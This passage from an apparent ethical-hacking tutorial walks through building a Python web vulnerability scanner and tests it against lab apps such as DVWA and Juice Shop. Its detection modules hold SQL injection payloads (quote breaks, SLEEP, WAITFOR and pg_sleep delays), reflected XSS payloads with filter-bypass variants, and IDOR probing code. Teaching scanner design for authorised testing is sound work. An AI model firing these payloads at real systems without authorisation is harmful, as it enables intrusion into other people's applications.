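The `crawl` function above calls `extract_url_params`, which the guide does not define. A minimal sketch of that helper follows, assuming it should return `Parameter` objects with `location` set to `"query"` and a coarse `param_type` guess. The `Parameter` class is repeated here only to keep the example self-contained.

```python
from dataclasses import dataclass
from typing import List
from urllib.parse import parse_qsl, urlparse


@dataclass
class Parameter:  # mirrors the Parameter dataclass from "Key Data Structures"
    name: str
    value: str
    location: str
    param_type: str


def extract_url_params(url: str) -> List[Parameter]:
    """Turn the query string of url into a list of Parameter records."""
    params = []
    # keep_blank_values=True so that empty parameters (?debug=) are still tested.
    for name, value in parse_qsl(urlparse(url).query, keep_blank_values=True):
        param_type = "numeric" if value.isascii() and value.isdigit() else "string"
        params.append(Parameter(name, value, "query", param_type))
    return params


for param in extract_url_params("http://lab.test/products?id=5&q=shoes&debug="):
    print(param)
```

The `param_type` guess is what later lets the IDOR module pick out numeric IDs without re-parsing every URL.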

Phase 2: SQL Injection Module (Days 3-6)

Goal: Detect SQL injection in any parameter

Implementation steps:

  1. Create payload injection framework:
    from urllib.parse import parse_qs, urlencode, urlparse

    def inject_parameter(session: WebSession, url: str, param: str, payload: str, method: str = 'GET') -> requests.Response:
        """Inject payload into specific parameter"""
        if method == 'GET':
            # Modify URL query string; keep_blank_values preserves empty parameters
            parsed = urlparse(url)
            params = parse_qs(parsed.query, keep_blank_values=True)
            params[param] = [payload]
            new_query = urlencode(params, doseq=True)
            new_url = parsed._replace(query=new_query).geturl()
            return session.get(new_url)
        else:
            # Modify POST body (only the injected field is sent; other form fields are dropped)
            return session.post(url, data={param: payload})
    
  2. Implement error-based detection:

```python
from typing import Optional

# Lowercase fragments of common database error messages
SQL_ERRORS = [
    "you have an error in your sql syntax",
    "warning: mysql",
    "unclosed quotation mark",
    "quoted string not properly terminated",
    "sqlexception",
    "microsoft ole db provider for sql server",
    "postgresql query failed",
    "syntax error at or near",
]


def test_sqli_error_based(session: WebSession, url: str, param: str) -> Optional[Vulnerability]:
    payloads = ["'", '"', "' OR '1'='1", "1' AND '1'='1"]

    for payload in payloads:
        response = inject_parameter(session, url, param, payload)
        body = response.text.lower()  # lowercase once per response
        for error in SQL_ERRORS:
            if error in body:
                return Vulnerability(
                    vuln_type="SQL Injection (Error-based)",
                    severity="critical",
                    url=url,
                    parameter=param,
                    payload=payload,
                    evidence=f"SQL error found: {error}",
                    reproduction_steps=[
                        f"1. Navigate to {url}",
                        f"2. Set parameter {param} to: {payload}",
                        f"3. Observe SQL error in response"
                    ],
                    recommendation="Use parameterized queries/prepared statements"
                )
    return None
```
  3. Implement time-based detection:

```python
import time
from typing import Optional


def test_sqli_time_based(session: WebSession, url: str, param: str) -> Optional[Vulnerability]:
    delay = 5  # seconds
    payloads = [
        f"' AND SLEEP({delay})-- ",                        # MySQL: "--" must be followed by whitespace
        f"'; WAITFOR DELAY '0:0:{delay}'--",               # Microsoft SQL Server
        f"' AND 1=(SELECT 1 FROM pg_sleep({delay}))--",    # PostgreSQL: pg_sleep returns void, so wrap it
    ]

    # First, get baseline response time
    start = time.perf_counter()
    session.get(url)
    baseline = time.perf_counter() - start

    for payload in payloads:
        start = time.perf_counter()
        inject_parameter(session, url, param, payload)
        elapsed = time.perf_counter() - start

        if elapsed >= baseline + delay - 0.5:  # Allow 0.5s tolerance
            return Vulnerability(
                vuln_type="SQL Injection (Time-based Blind)",
                severity="critical",
                url=url,
                parameter=param,
                payload=payload,
                evidence=f"Response delayed by {elapsed:.1f}s (expected {delay}s)",
                reproduction_steps=[...],  # elided in the original
                recommendation="Use parameterized queries/prepared statements"
            )
    return None
```

Verification: Detect SQLi in DVWA with security level “low”
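
A single baseline request makes the time-based check sensitive to one slow response. One possible refinement, sketched here under the assumption that the scanner collects several baseline timings first, is to compare against their median. The name `delay_is_significant` is hypothetical.

```python
import statistics
from typing import Sequence


def delay_is_significant(baseline_samples: Sequence[float], elapsed: float,
                         delay: float, tolerance: float = 0.5) -> bool:
    """Compare an injected request against the median of several baselines."""
    # The median ignores a single outlier such as one unusually slow response.
    baseline = statistics.median(baseline_samples)
    return elapsed >= baseline + delay - tolerance


SAMPLES = [0.21, 0.19, 2.40]  # seconds; the third request hit a slow moment
print(delay_is_significant(SAMPLES, elapsed=5.3, delay=5.0))
print(delay_is_significant(SAMPLES, elapsed=2.5, delay=5.0))
```

Repeating a positive result with a different delay value (for example 3 seconds) and checking that the response time follows it is a cheap way to confirm the finding before reporting it.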

Phase 3: XSS Module (Days 6-9)

Goal: Detect reflected XSS vulnerabilities

Implementation steps:

  1. Create XSS payload generator:

```python
import random

XSS_PAYLOADS = [
    '<script>alert(1)</script>',
    '<img src=x onerror=alert(1)>',
    '"><script>alert(1)</script>',
    "'-alert(1)-'",
    '<svg onload=alert(1)>',
]


# Random marker to detect reflection
def generate_xss_marker():
    return f"xss{random.randint(10000, 99999)}"
```

  2. Implement reflection detection:
```python
def test_xss_reflected(session: WebSession, url: str, param: str) -> List[Vulnerability]:
    vulnerabilities = []

    for payload in XSS_PAYLOADS:
        response = inject_parameter(session, url, param, payload)

        # Check if payload is reflected unencoded
        if payload in response.text:
            # Determine context
            context = determine_xss_context(response.text, payload)

            vulnerabilities.append(Vulnerability(
                vuln_type=f"Reflected XSS ({context})",
                severity="high",
                url=url,
                parameter=param,
                payload=payload,
                evidence=f"Payload reflected in {context} context",
                reproduction_steps=[
                    f"1. Navigate to {url}",
                    f"2. Set parameter {param} to: {payload}",
                    f"3. Observe JavaScript execution"
                ],
                recommendation="Encode output based on context (HTML, JS, URL)"
            ))
            break  # Found XSS, no need to test more payloads

    return vulnerabilities

def determine_xss_context(html: str, payload: str) -> str:
    """Determine where payload landed in HTML"""
    soup = BeautifulSoup(html, 'html.parser')

    # Check if in script tag
    for script in soup.find_all('script'):
        if payload in script.text:
            return "JavaScript"

    # Check if in attribute
    for tag in soup.find_all():
        for attr, value in tag.attrs.items():
            if isinstance(value, str) and payload in value:
                return f"Attribute ({attr})"

    return "HTML body"
```

  3. Add filter bypass payloads:
    XSS_BYPASS_PAYLOADS = [
        # Case variation
        '<ScRiPt>alert(1)</ScRiPt>',
        # Event handlers
        '<img src=x onerror=alert(1)>',
        '<body onload=alert(1)>',
        # Unicode escape in the identifier. The raw string keeps the backslash,
        # and JavaScript accepts \uXXXX escapes in identifiers, not in punctuation.
        r'<script>\u0061lert(1)</script>',
        # Double encoding
        '%253Cscript%253Ealert(1)%253C/script%253E',
    ]
    

Verification: Detect XSS in DVWA and OWASP WebGoat
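
The `generate_xss_marker` helper from step 1 is not used by the detection code shown. One possible use, given as a rough sketch rather than the scanner's actual logic, is to send a harmless probe that places HTML metacharacters between two copies of the marker, then check which characters come back unencoded. `build_probe` and `unencoded_chars` are hypothetical names, and the marker value below is a fixed example.

```python
import html
from typing import List

PROBE_CHARS = ['<', '>', '"', "'"]


def build_probe(marker: str) -> str:
    """Place the metacharacters between two copies of the marker."""
    return f"{marker}{''.join(PROBE_CHARS)}{marker}"


def unencoded_chars(body: str, marker: str) -> List[str]:
    """Return the probe characters that were reflected without encoding."""
    start = body.find(marker)
    if start == -1:
        return []
    end = body.find(marker, start + len(marker))
    if end == -1:
        return []
    reflected = body[start + len(marker):end]
    return [c for c in PROBE_CHARS if c in reflected]


# Canned response bodies, so the sketch runs without a network target
probe = build_probe("xss12345")
raw_page = f"<p>You searched for {probe}</p>"
safe_page = f"<p>You searched for {html.escape(probe)}</p>"
```

Knowing which characters survive lets the scanner skip payloads that cannot work in that parameter, for example tag-based payloads when `<` is always encoded.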

Phase 4: Security Headers and Misconfig Detection (Days 9-11)

Goal: Check for missing security headers and misconfigurations

Implementation steps:

  1. Security headers analyzer:

```python
SECURITY_HEADERS = {
    'Strict-Transport-Security': {
        'severity': 'medium',
        'recommendation': 'Add HSTS header: Strict-Transport-Security: max-age=31536000; includeSubDomains'
    },
    'Content-Security-Policy': {
        'severity': 'medium',
        'recommendation': 'Implement Content Security Policy to prevent XSS'
    },
    'X-Content-Type-Options': {
        'severity': 'low',
        'recommendation': 'Add X-Content-Type-Options: nosniff'
    },
    'X-Frame-Options': {
        'severity': 'medium',
        'recommendation': 'Add X-Frame-Options: DENY or SAMEORIGIN'
    },
    # Legacy header: current browsers have removed the XSS auditor it controlled,
    # so treat this finding as informational and rely on Content-Security-Policy.
    'X-XSS-Protection': {
        'severity': 'low',
        'recommendation': 'Add X-XSS-Protection: 1; mode=block'
    }
}

def check_security_headers(response: requests.Response) -> List[Vulnerability]:
    vulnerabilities = []

    for header, info in SECURITY_HEADERS.items():
        if header not in response.headers:
            vulnerabilities.append(Vulnerability(
                vuln_type=f"Missing Security Header: {header}",
                severity=info['severity'],
                url=response.url,
                parameter="N/A",
                payload="N/A",
                evidence=f"Header {header} not present in response",
                reproduction_steps=[
                    f"1. Request {response.url}",
                    f"2. Inspect response headers",
                    f"3. Note absence of {header}"
                ],
                recommendation=info['recommendation']
            ))

    # Check for information disclosure
    for header in ['Server', 'X-Powered-By', 'X-AspNet-Version']:
        if header in response.headers:
            vulnerabilities.append(Vulnerability(
                vuln_type=f"Information Disclosure: {header}",
                severity='low',
                url=response.url,
                parameter="N/A",
                payload="N/A",
                evidence=f"{header}: {response.headers[header]}",
                reproduction_steps=[...],
                recommendation=f"Remove or genericize {header} header"
            ))

    return vulnerabilities
```
  2. Directory listing detection:
    def check_directory_listing(session: WebSession, base_url: str) -> List[Vulnerability]:
        common_dirs = ['/images/', '/uploads/', '/static/', '/assets/', '/css/', '/js/']
        vulnerabilities = []

        for directory in common_dirs:
            url = urljoin(base_url, directory)
            response = session.get(url)

            if response.status_code == 200:
                if 'Index of' in response.text or 'Directory listing' in response.text:
                    vulnerabilities.append(Vulnerability(
                        vuln_type="Directory Listing Enabled",
                        severity="low",
                        url=url,
                        parameter="N/A",
                        payload="N/A",
                        evidence="Directory contents visible",
                        reproduction_steps=[f"Navigate to {url}"],
                        recommendation="Disable directory listing in web server config"
                    ))

        return vulnerabilities
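
A header being present does not mean it is configured well. As a hedged illustration of a value check, the sketch below parses a `Strict-Transport-Security` value and flags a short `max-age` or a missing `includeSubDomains`. The function name `hsts_issues` is hypothetical, and the one-year threshold is simply borrowed from the recommendation string in the header table.

```python
import re
from typing import List

MIN_MAX_AGE = 31536000  # one year; assumption taken from the recommendation text


def hsts_issues(value: str, min_age: int = MIN_MAX_AGE) -> List[str]:
    """Return human-readable problems found in an HSTS header value."""
    issues = []

    match = re.search(r'max-age\s*=\s*"?(\d+)"?', value, re.IGNORECASE)
    if not match:
        issues.append("max-age directive missing")
    elif int(match.group(1)) < min_age:
        issues.append(f"max-age {match.group(1)} is below {min_age}")

    # Directive names are case-insensitive, so compare in lowercase
    directives = [d.strip().lower() for d in value.split(';')]
    if 'includesubdomains' not in directives:
        issues.append("includeSubDomains not set")

    return issues
```

A non-empty result could be reported as a low-severity misconfiguration with the list joined into the evidence field.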
    

Phase 5: IDOR and Access Control (Days 11-13)

Goal: Detect insecure direct object references

Implementation steps:

  1. Identify numeric parameters:
    def find_numeric_params(crawl_results: List[CrawlResult]) -> List[tuple]:
        """Find all numeric ID parameters"""
        id_params = []

        for result in crawl_results:
            for param in result.parameters:
                # Check if value is numeric
                if param.value.isdigit():
                    id_params.append((result.url, param.name, param.value))

        return id_params
    
  2. Test for IDOR:

```python
def test_idor(session: WebSession, url: str, param: str, original_id: str) -> Optional[Vulnerability]:
    """Test if changing ID returns different user's data"""

    # Get original response
    original_response = session.get(url)

    # Try adjacent IDs
    test_ids = [
        str(int(original_id) + 1),
        str(int(original_id) - 1),
        str(int(original_id) * 2),
    ]

    for test_id in test_ids:
        modified_url = url.replace(f"{param}={original_id}", f"{param}={test_id}")
        test_response = session.get(modified_url)

        # If we get a 200 with different content, potential IDOR
        if test_response.status_code == 200:
            if test_response.text != original_response.text:
                # Further analysis: does it contain PII-like data?
                if contains_pii_indicators(test_response.text):
                    return Vulnerability(
                        vuln_type="Insecure Direct Object Reference (IDOR)",
                        severity="high",
                        url=url,
                        parameter=param,
                        payload=f"Changed {original_id} to {test_id}",
                        evidence="Different data returned for modified ID",
                        reproduction_steps=[
                            f"1. Request original: {url}",
                            f"2. Modify {param} from {original_id} to {test_id}",
                            f"3. Observe different user data returned"
                        ],
                        recommendation="Implement proper authorization checks"
                    )

    return None


def contains_pii_indicators(text: str) -> bool:
    """Check if response might contain personal data"""
    indicators = ['email', 'phone', 'address', 'ssn', 'password', 'credit', 'account']
    return any(ind in text.lower() for ind in indicators)
```
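
Comparing response bodies with `!=` flags any page that embeds a timestamp or CSRF token, even when both requests return the same record. A possible refinement, offered as a sketch with an arbitrary cutoff, is to compare bodies by similarity ratio using the standard library's `difflib`. The names `similarity` and `is_meaningfully_different` and the `0.95` threshold are assumptions to tune against lab targets.

```python
from difflib import SequenceMatcher


def similarity(a: str, b: str) -> float:
    """Ratio in [0, 1]; 1.0 means the two bodies are identical."""
    # autojunk=False keeps the ratio stable on long, repetitive HTML
    return SequenceMatcher(None, a, b, autojunk=False).ratio()


def is_meaningfully_different(a: str, b: str, threshold: float = 0.95) -> bool:
    """Treat small differences (tokens, timestamps) as the same page."""
    return similarity(a, b) < threshold
```

`SequenceMatcher` can be slow on very large bodies, so truncating each response to a fixed prefix before comparing may be a reasonable trade-off.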


Phase 6: Reporting and Integration (Days 13-14)

Goal: Generate professional vulnerability reports

Implementation steps:

1. Report generator:
```python
from datetime import datetime

from jinja2 import Template

def generate_html_report(vulnerabilities: List[Vulnerability], target: str) -> str:
    template = Template('''
    <!DOCTYPE html>
    <html>
    <head>
        <title>Vulnerability Scan Report - {{ target }}</title>
        <style>
            .critical { background-color: #ff4444; color: white; }
            .high { background-color: #ff8800; color: white; }
            .medium { background-color: #ffbb33; }
            .low { background-color: #99cc00; }
            .finding { border: 1px solid #ccc; margin: 10px; padding: 15px; }
        </style>
    </head>
    <body>
        <h1>Vulnerability Scan Report</h1>
        <h2>Target: {{ target }}</h2>
        <h2>Scan Date: {{ scan_date }}</h2>

        <h3>Summary</h3>
        <ul>
            <li class="critical">Critical: {{ critical_count }}</li>
            <li class="high">High: {{ high_count }}</li>
            <li class="medium">Medium: {{ medium_count }}</li>
            <li class="low">Low: {{ low_count }}</li>
        </ul>

        <h3>Findings</h3>
        {% for vuln in vulnerabilities %}
        <div class="finding {{ vuln.severity }}">
            <h4>{{ vuln.vuln_type }}</h4>
            <p><strong>URL:</strong> {{ vuln.url }}</p>
            <p><strong>Parameter:</strong> {{ vuln.parameter }}</p>
            <p><strong>Payload:</strong> <code>{{ vuln.payload }}</code></p>
            <p><strong>Evidence:</strong> {{ vuln.evidence }}</p>
            <p><strong>Recommendation:</strong> {{ vuln.recommendation }}</p>
        </div>
        {% endfor %}
    </body>
    </html>
    ''', autoescape=True)  # escape findings so reflected payloads render as text, not markup

    return template.render(
        target=target,
        scan_date=datetime.now().isoformat(),
        vulnerabilities=vulnerabilities,
        critical_count=sum(1 for v in vulnerabilities if v.severity == 'critical'),
        high_count=sum(1 for v in vulnerabilities if v.severity == 'high'),
        medium_count=sum(1 for v in vulnerabilities if v.severity == 'medium'),
        low_count=sum(1 for v in vulnerabilities if v.severity == 'low'),
    )
```

  2. JSON export for tool integration:
    def export_json(vulnerabilities: List[Vulnerability], filepath: str):
        data = {
            'scan_date': datetime.now().isoformat(),
            'total_findings': len(vulnerabilities),
            'findings': [asdict(v) for v in vulnerabilities]
        }
        with open(filepath, 'w') as f:
            json.dump(data, f, indent=2)
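
Both outputs tend to read better when the most severe findings come first and the summary counts are computed in one pass. The following is a minimal sketch of that idea. `Finding` is a hypothetical stand-in for the project's `Vulnerability` class and carries only the two fields used here.

```python
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List

SEVERITY_ORDER = ["critical", "high", "medium", "low"]


@dataclass
class Finding:
    """Hypothetical stand-in exposing only the fields this sketch needs."""
    vuln_type: str
    severity: str


def sort_by_severity(findings: List[Finding]) -> List[Finding]:
    """Order findings from critical to low; unknown severities go last."""
    rank = {name: i for i, name in enumerate(SEVERITY_ORDER)}
    return sorted(findings, key=lambda f: rank.get(f.severity, len(rank)))


def severity_counts(findings: List[Finding]) -> Dict[str, int]:
    """Count findings per severity, including zero for unused levels."""
    counts = Counter(f.severity for f in findings)
    return {name: counts.get(name, 0) for name in SEVERITY_ORDER}
```

The dictionary from `severity_counts` could feed both the HTML summary and an extra key in the JSON export.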
    

Testing Strategy

Testing Against Intentionally Vulnerable Applications

  1. DVWA (Damn Vulnerable Web Application)
    • Test at “Low” security level first
    • Progress through Medium and High
    • Your scanner should find SQLi and XSS at Low
  2. OWASP WebGoat
    • Structured lessons for each vulnerability type
    • Verify your scanner finds the intended vulnerabilities
  3. OWASP Juice Shop
    • Modern JavaScript-heavy application
    • Tests your crawler’s ability to handle SPAs

Unit Testing Payloads

def test_sqli_payloads_detected():
    # Test against known vulnerable responses
    vulnerable_response = "You have an error in your SQL syntax"
    assert is_sqli_error(vulnerable_response)

    clean_response = "No products found"
    assert not is_sqli_error(clean_response)

def test_xss_reflection_detection():
    html = '<input value="<script>alert(1)</script>">'
    assert detect_xss_reflection(html, '<script>alert(1)</script>')

Common Pitfalls and Debugging

1. “False positives everywhere”

Problem: Scanner reports vulnerabilities that aren’t real

Solutions:

  • Verify by actually exploiting (does payload execute?)
  • Add confidence scoring
  • Require multiple indicators before reporting
  • Filter out honeypot/WAF responses
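
Confidence scoring and the multiple-indicator rule can be combined in a few lines. This is a sketch under stated assumptions: the indicator names, their weights, and the `0.6` threshold are all illustrative values, not something the scanner defines.

```python
from typing import Dict, Iterable

# Illustrative weights; tune them against lab targets
INDICATOR_WEIGHTS: Dict[str, float] = {
    "error_message": 0.4,
    "time_delay": 0.4,
    "boolean_difference": 0.3,
    "payload_reflected": 0.3,
}


def confidence(indicators: Iterable[str]) -> float:
    """Sum the weights of distinct known indicators, capped at 1.0."""
    score = sum(INDICATOR_WEIGHTS.get(name, 0.0) for name in set(indicators))
    return min(score, 1.0)


def should_report(indicators: Iterable[str], threshold: float = 0.6,
                  min_indicators: int = 2) -> bool:
    """Report only when several independent indicators agree."""
    known = {name for name in indicators if name in INDICATOR_WEIGHTS}
    return len(known) >= min_indicators and confidence(known) >= threshold
```

Findings that fall below the threshold could still be logged at a lower severity for manual review instead of being dropped.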

2. “Missing obvious vulnerabilities”

Problem: Known vulnerable app, scanner finds nothing

Debug steps:

  1. Is the crawler finding the vulnerable pages?
  2. Is the parameter being tested?
  3. Check if WAF is blocking payloads
  4. Try different payload encodings
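
For step 4, a small helper can produce the common encodings of one payload. The sketch below uses `urllib.parse.quote` from the standard library. The function name `encoding_variants` is an assumption, and the set of encodings is only a starting point.

```python
from typing import List
from urllib.parse import quote


def encoding_variants(payload: str) -> List[str]:
    """Return the payload plus URL, double-URL, and HTML-entity encodings."""
    url_encoded = quote(payload, safe='')
    double_encoded = quote(url_encoded, safe='')
    html_entities = ''.join(f'&#{ord(c)};' for c in payload)

    variants = [payload, url_encoded, double_encoded, html_entities]
    # dict.fromkeys removes duplicates while keeping the original order
    return list(dict.fromkeys(variants))
```

Keep in mind that an HTTP client may URL-encode parameters again when it sends them, so check the raw request (for example through a proxy) to confirm what the server actually receives.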

3. “Crawler goes off-site or loops forever”

Problem: Crawler follows external links or revisits pages

Solutions:

  • Strict domain checking
  • Track visited URLs in a set
  • Set maximum crawl depth
  • Implement timeout per page
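
The first three safeguards fit into a single gate that the crawler calls before queueing a URL. This is a minimal sketch, assuming the crawler tracks depth itself. `normalize`, `should_visit`, and the default `max_depth` of 3 are hypothetical choices.

```python
from typing import Set
from urllib.parse import urldefrag, urlparse


def normalize(url: str) -> str:
    """Drop the fragment and trailing slash so one page is not queued twice."""
    without_fragment, _ = urldefrag(url)
    return without_fragment.rstrip('/')


def should_visit(url: str, base_url: str, visited: Set[str],
                 depth: int, max_depth: int = 3) -> bool:
    """Return True (and record the URL) only for new, in-scope pages."""
    if depth > max_depth:
        return False

    target, base = urlparse(url), urlparse(base_url)
    if target.scheme not in ('http', 'https'):
        return False
    # Strict host check: subdomains and other hosts are out of scope
    if target.netloc.lower() != base.netloc.lower():
        return False

    key = normalize(url)
    if key in visited:
        return False
    visited.add(key)
    return True
```

Comparing the full `netloc` keeps the crawler on one host and port. Widening scope to subdomains should be an explicit, authorized decision.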

4. “XSS not detected even when payload reflects”

Problem: Payload in response but not marked as XSS

Debug steps:

  1. Is response HTML or JSON?
  2. Is payload HTML-encoded in response?
  3. Check if context detection is working
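
The first two debug questions can be answered by a small helper that inspects the `Content-Type` value and classifies how the payload appears in the body. The sketch below is only a debugging aid, and the names `is_html_content` and `reflection_state` are assumptions.

```python
import html


def is_html_content(content_type: str) -> bool:
    """True when the Content-Type value names an HTML media type."""
    media_type = content_type.split(';', 1)[0].strip().lower()
    return media_type in ('text/html', 'application/xhtml+xml')


def reflection_state(body: str, payload: str) -> str:
    """Classify the payload as 'raw', 'html-encoded', or 'absent'."""
    if payload in body:
        return "raw"
    # Check both escaping styles: with and without quote escaping
    if html.escape(payload) in body or html.escape(payload, quote=False) in body:
        return "html-encoded"
    return "absent"
```

A "raw" reflection in a JSON response is usually not exploitable in the browser, which is why the content type check comes first.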

Extensions and Challenges

Beginner Extensions

  1. Add more payloads: Load from external files
  2. Progress reporting: Show real-time scan progress
  3. Proxy support: Route through Burp Suite

Intermediate Extensions

  1. JavaScript rendering: Use Selenium for SPAs
  2. CSRF detection: Check for missing tokens
  3. Session handling: Test with authenticated sessions

Advanced Extensions

  1. WAF bypass payloads: Encoding and obfuscation
  2. API fuzzing: REST/GraphQL vulnerability testing
  3. SSRF detection: With callback server
  4. Stored XSS: Re-check pages for persisted payloads

Real-World Connections

Commercial Scanners

Your project is a simplified version of:

  • Burp Suite Pro - Industry standard web scanner
  • OWASP ZAP - Open source alternative
  • Nuclei - Template-based vulnerability scanner

After this project, study how these tools work—they’re built on the same concepts but with years of refinement.

Bug Bounty Application

These skills directly apply to bug bounty:

  • Subdomain enumeration → More attack surface
  • Automated scanning → Find low-hanging fruit
  • Manual verification → Avoid invalid or false-positive reports
  • Report writing → Get paid faster

Self-Assessment Checklist

Core Functionality

  • Crawler discovers all pages and forms
  • SQLi detection works (error-based and time-based)
  • XSS detection works (reflected)
  • Security headers are checked
  • HTML report is generated

Code Quality

  • Modular design (can add new modules easily)
  • Error handling (doesn’t crash on edge cases)
  • Configuration options (timeout, threads, etc.)
  • CLI with --help

Understanding

  • Can explain how SQL injection works at query level
  • Understand difference between XSS contexts
  • Know why parameterized queries prevent SQLi
  • Understand OWASP Top 10 categories

Validation

  • Finds vulnerabilities in DVWA (low security)
  • Minimal false positives on clean application
  • Report is professional quality

Resources

Primary Reading

  • “Bug Bounty Bootcamp” by Vickie Li - Chapters 6-12
  • “The Web Application Hacker’s Handbook” by Stuttard & Pinto
  • “HTTP: The Definitive Guide” by David Gourley & Brian Totty

Online Resources

Practice Environments

  • DVWA - docker run -p 80:80 vulnerables/web-dvwa
  • OWASP WebGoat - docker run -p 8080:8080 webgoat/webgoat
  • OWASP Juice Shop - docker run -p 3000:3000 bkimminich/juice-shop

This project is part of the Ethical Hacking & Penetration Testing learning path.